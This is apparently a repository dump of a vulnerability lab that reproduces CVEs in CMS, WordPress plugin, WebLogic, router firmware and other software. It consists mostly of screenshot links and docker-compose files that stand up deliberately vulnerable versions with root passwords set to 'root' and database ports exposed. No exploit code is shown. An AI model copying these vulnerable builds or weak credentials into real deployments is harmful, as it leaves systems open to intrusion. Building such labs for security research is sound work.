--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/icon-view.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/icon-wx.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/index-header-img-arm.svg:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/index-header-img-cloud.svg:
--------------------------------------------------------------------------------
1 |
5 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/index-header-img-heart.svg:
--------------------------------------------------------------------------------
1 |
4 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo-graphic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo-graphic.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo-heycore.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo-heycore.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo-original.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo-original.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/logo.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-csdn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-csdn.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-gitee.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-gitee.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-github.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-github.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-jianshu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-jianshu.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-oschina.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-oschina.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-zhihu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/img/qa-zhihu.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts0.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts1.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts2.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts3.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts4.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/dialogs/charts/images/charts5.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/themes/default/images/sortable.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/themes/default/images/sortable.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/assets/ueditor/third-party/highcharts/modules/heatmap.js:
--------------------------------------------------------------------------------
1 | (function(b){var k=b.seriesTypes,l=b.each;k.heatmap=b.extendClass(k.map,{colorKey:"z",useMapGeometry:!1,pointArrayMap:["y","z"],translate:function(){var c=this,b=c.options,i=Number.MAX_VALUE,j=Number.MIN_VALUE;c.generatePoints();l(c.data,function(a){var e=a.x,f=a.y,d=a.z,g=(b.colsize||1)/2,h=(b.rowsize||1)/2;a.path=["M",e-g,f-h,"L",e+g,f-h,"L",e+g,f+h,"L",e-g,f+h,"Z"];a.shapeType="path";a.shapeArgs={d:c.translatePath(a.path)};typeof d==="number"&&(d>j?j=d:d
2 |
3 |
4 |
5 | Welcome to PublicCMS!
6 |
7 |
8 |
9 |
10 |
11 | 欢迎使用PublicCMS!
12 | 当您的站点启用静态化,并生成静态页面后,这个页面将会被PublicCMS更换。
13 | Welcome to PublicCMS!
14 | When your site is enabled static, and generate the static pages, this page will be replaced by the PublicCMS.
15 |
16 |
17 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/upload/2020/03-24/12-28-500720-90407063.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/upload/2020/03-24/12-28-500720-90407063.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/upload/2020/03-24/12-32-2905711856271141.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/upload/2020/03-24/12-32-2905711856271141.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/upload/2020/03-24/12-32-36030545988429.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/web/site_4/upload/2020/03-24/12-32-36030545988429.png
--------------------------------------------------------------------------------
/Rebuild/CVE-2024-1021/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Rebuild/CVE-2024-1021/1.png
--------------------------------------------------------------------------------
/Rebuild/CVE-2024-1021/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Rebuild/CVE-2024-1021/2.png
--------------------------------------------------------------------------------
/Rebuild/CVE-2024-1021/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | java_web:
4 | image: shelter2024/rebuild-3.5.5-web
5 | container_name: rebuild-3.5.5-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:18080"
10 |
11 |
12 | mysql:
13 | image: mysql:5.7
14 | container_name: rebuild-3.5.5-web-mysql
15 | environment:
16 | - MYSQL_ROOT_PASSWORD=root
17 | - MYSQL_DATABASE=root
18 | ports:
19 | - 3306:3306
20 |
21 |
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/1.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/10.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/2.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/3.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/4.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/5.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/6.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/7.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/8.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SeaCMS/CVE-2024-30565/9.png
--------------------------------------------------------------------------------
/SeaCMS/CVE-2024-30565/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/seacms-v12.9-web
5 | container_name: SeaCMS-v12.9-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "3306:3306"
10 | - "80:80"
11 |
12 | mysql:
13 | image: mysql:5.7
14 | container_name: SeaCMS-v12.9-mysql
15 |
16 | environment:
17 | MYSQL_ROOT_PASSWORD: root
18 |
--------------------------------------------------------------------------------
/SpiderFlow/CVE-2024-0195/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SpiderFlow/CVE-2024-0195/1.png
--------------------------------------------------------------------------------
/SpiderFlow/CVE-2024-0195/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SpiderFlow/CVE-2024-0195/2.png
--------------------------------------------------------------------------------
/SpiderFlow/CVE-2024-0195/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/SpiderFlow/CVE-2024-0195/3.png
--------------------------------------------------------------------------------
/SpiderFlow/CVE-2024-0195/Dockerfile:
--------------------------------------------------------------------------------
1 | # Use an official OpenJDK runtime as a parent image
2 | FROM openjdk:8
3 | RUN apt-get update && apt-get install -y iputils-ping
4 | # Set the working directory to /app
5 | WORKDIR /app
6 |
7 | # Copy the fat jar into the container at /app
8 | COPY app/ /app
9 | # Make port 8080 available to the world outside this container
10 | EXPOSE 8080
11 | # Run jar file when the container launches
12 | CMD sleep 3 && java -jar spider-flow.jar
13 | #CMD ["java", "-jar", "ruoyi-admin.jar"]
14 |
--------------------------------------------------------------------------------
/SpiderFlow/CVE-2024-0195/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | java_web:
4 | image: shelter2024/spiderflow-v0.5.0-web
5 | container_name: Spiderflow-v0.5.0-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "8080:8080"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: Spiderflow-v0.5.0-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 | ports:
16 | - 3306:3306
17 | volumes:
18 | - ./sqldata/spiderflow.sql:/docker-entrypoint-initdb.d/init.sql
19 |
--------------------------------------------------------------------------------
/SpringBlade/CVE-2022-27360/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 |
3 | services:
4 | backend:
5 | image: shelter2024/springblade-v3.2.0-backend-web
6 | container_name: SpringBlade-v3.2.0-backend-web
7 | depends_on:
8 | - mysql
9 | - redis
10 | ports:
11 | - "80:80"
12 |
13 | frontend:
14 | image: shelter2024/springblade-v3.2.0-frontend-web
15 | container_name: SpringBlade-v3.2.0-frontend-web
16 | ports:
17 | - "1888:1888"
18 |
19 |
20 | mysql:
21 | image: mysql:5.6
22 | container_name: SpringBlade-v3.2.0-web-mysql
23 | environment:
24 | - MYSQL_ROOT_PASSWORD=root
25 | - MYSQL_DATABASE=blade
26 | ports:
27 | - 3306:3306
28 |
29 | volumes:
30 | - ./sqldata/blade-sword-mysql.sql:/docker-entrypoint-initdb.d/init.sql
31 |
32 | redis:
33 | image: redis
34 | container_name: SpringBlade-v3.2.0-web-redis
35 | ports:
36 | - 6379:6379
37 |
--------------------------------------------------------------------------------
/TEW-800MB/CVE-2024-0918/fw_tew800mb(v1.0.1.0)_08012013.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/TEW-800MB/CVE-2024-0918/fw_tew800mb(v1.0.1.0)_08012013.zip
--------------------------------------------------------------------------------
/Weblogic/CVE-2024-20931/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Weblogic/CVE-2024-20931/1.png
--------------------------------------------------------------------------------
/Weblogic/CVE-2024-20931/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Weblogic/CVE-2024-20931/2.png
--------------------------------------------------------------------------------
/Weblogic/CVE-2024-20931/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Weblogic/CVE-2024-20931/3.png
--------------------------------------------------------------------------------
/Weblogic/CVE-2024-20931/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Weblogic/CVE-2024-20931/4.png
--------------------------------------------------------------------------------
/Weblogic/CVE-2024-20931/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Weblogic/CVE-2024-20931/5.png
--------------------------------------------------------------------------------
/WeiPHP/weiphp-v5.0-weixin-nptice-index-rce/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WeiPHP/weiphp-v5.0-weixin-nptice-index-rce/1.png
--------------------------------------------------------------------------------
/WeiPHP/weiphp-v5.0-weixin-nptice-index-rce/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WeiPHP/weiphp-v5.0-weixin-nptice-index-rce/2.png
--------------------------------------------------------------------------------
/WeiPHP/weiphp-v5.0-weixin-nptice-index-rce/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WeiPHP/weiphp-v5.0-weixin-nptice-index-rce/3.png
--------------------------------------------------------------------------------
/WeiPHP/weiphp-v5.0-weixin-nptice-index-rce/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/weiphp-v5.0-web
5 | container_name: weiphp-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "8000:8000"
10 | - "80:80"
11 | # volumes:
12 | # - ./apache-config:/etc/apache2/sites-available
13 | mysql:
14 | image: mysql:5.7
15 | container_name: weiphp-web-mysql
16 | environment:
17 | - MYSQL_ROOT_PASSWORD=root
18 | #- MYSQL_DATABASE=
19 | # volumes:
20 | # - ./database.sql:/docker-entrypoint-initdb.d/init.sql
21 |
--------------------------------------------------------------------------------
/WordPress/Automatic/CVE-2024-27954/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Automatic/CVE-2024-27954/1.png
--------------------------------------------------------------------------------
/WordPress/Automatic/CVE-2024-27954/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Automatic/CVE-2024-27954/2.png
--------------------------------------------------------------------------------
/WordPress/Automatic/CVE-2024-27954/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Automatic/CVE-2024-27954/3.png
--------------------------------------------------------------------------------
/WordPress/Automatic/CVE-2024-27954/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/wordpress-bricks1.9.5-web
5 | container_name: WordPress-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: WordPress-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 | - MYSQL_DATABASE=wordpress
16 |
--------------------------------------------------------------------------------
/WordPress/Automatic/CVE-2024-27954/wp-automatic.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Automatic/CVE-2024-27954/wp-automatic.zip
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/0.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/0.1.png
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/0.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/0.2.png
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/0.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/0.3.png
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/0.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/0.4.png
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/0.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/0.5.png
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/1.png
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/2.png
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/bricks.1.9.5.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/WordPress/Bricks/CVE-2024-25600/bricks.1.9.5.zip
--------------------------------------------------------------------------------
/WordPress/Bricks/CVE-2024-25600/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/wordpress-bricks1.9.5-web
5 | container_name: WordPress-Bricks1.9.5-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: WordPress-Bricks1.9.5-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 | - MYSQL_DATABASE=wordpress
16 |
--------------------------------------------------------------------------------
/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/1.png
--------------------------------------------------------------------------------
/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/2.png
--------------------------------------------------------------------------------
/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/3.png
--------------------------------------------------------------------------------
/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/4.png
--------------------------------------------------------------------------------
/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/5.png
--------------------------------------------------------------------------------
/YzmCMS/yzmcms-v7.0-db_pdo-where-rce/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/yzmcms-v7.0-web
5 | container_name: yzmcms-v7.0-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: yzmcms-v7.0-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 | - MYSQL_DATABASE=yzmcms
16 | volumes:
17 | - ./database.sql:/docker-entrypoint-initdb.d/init.sql
18 |
--------------------------------------------------------------------------------
/ZenML/CVE-2024-25723/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenML/CVE-2024-25723/1.png
--------------------------------------------------------------------------------
/ZenML/CVE-2024-25723/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenML/CVE-2024-25723/2.png
--------------------------------------------------------------------------------
/ZenML/CVE-2024-25723/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenML/CVE-2024-25723/3.png
--------------------------------------------------------------------------------
/ZenML/CVE-2024-25723/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenML/CVE-2024-25723/4.png
--------------------------------------------------------------------------------
/ZenTao/ZenTaoPMS/QVD-2024-15263/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenTao/ZenTaoPMS/QVD-2024-15263/1.png
--------------------------------------------------------------------------------
/ZenTao/ZenTaoPMS/QVD-2024-15263/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenTao/ZenTaoPMS/QVD-2024-15263/2.png
--------------------------------------------------------------------------------
/ZenTao/ZenTaoPMS/QVD-2024-15263/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenTao/ZenTaoPMS/QVD-2024-15263/3.png
--------------------------------------------------------------------------------
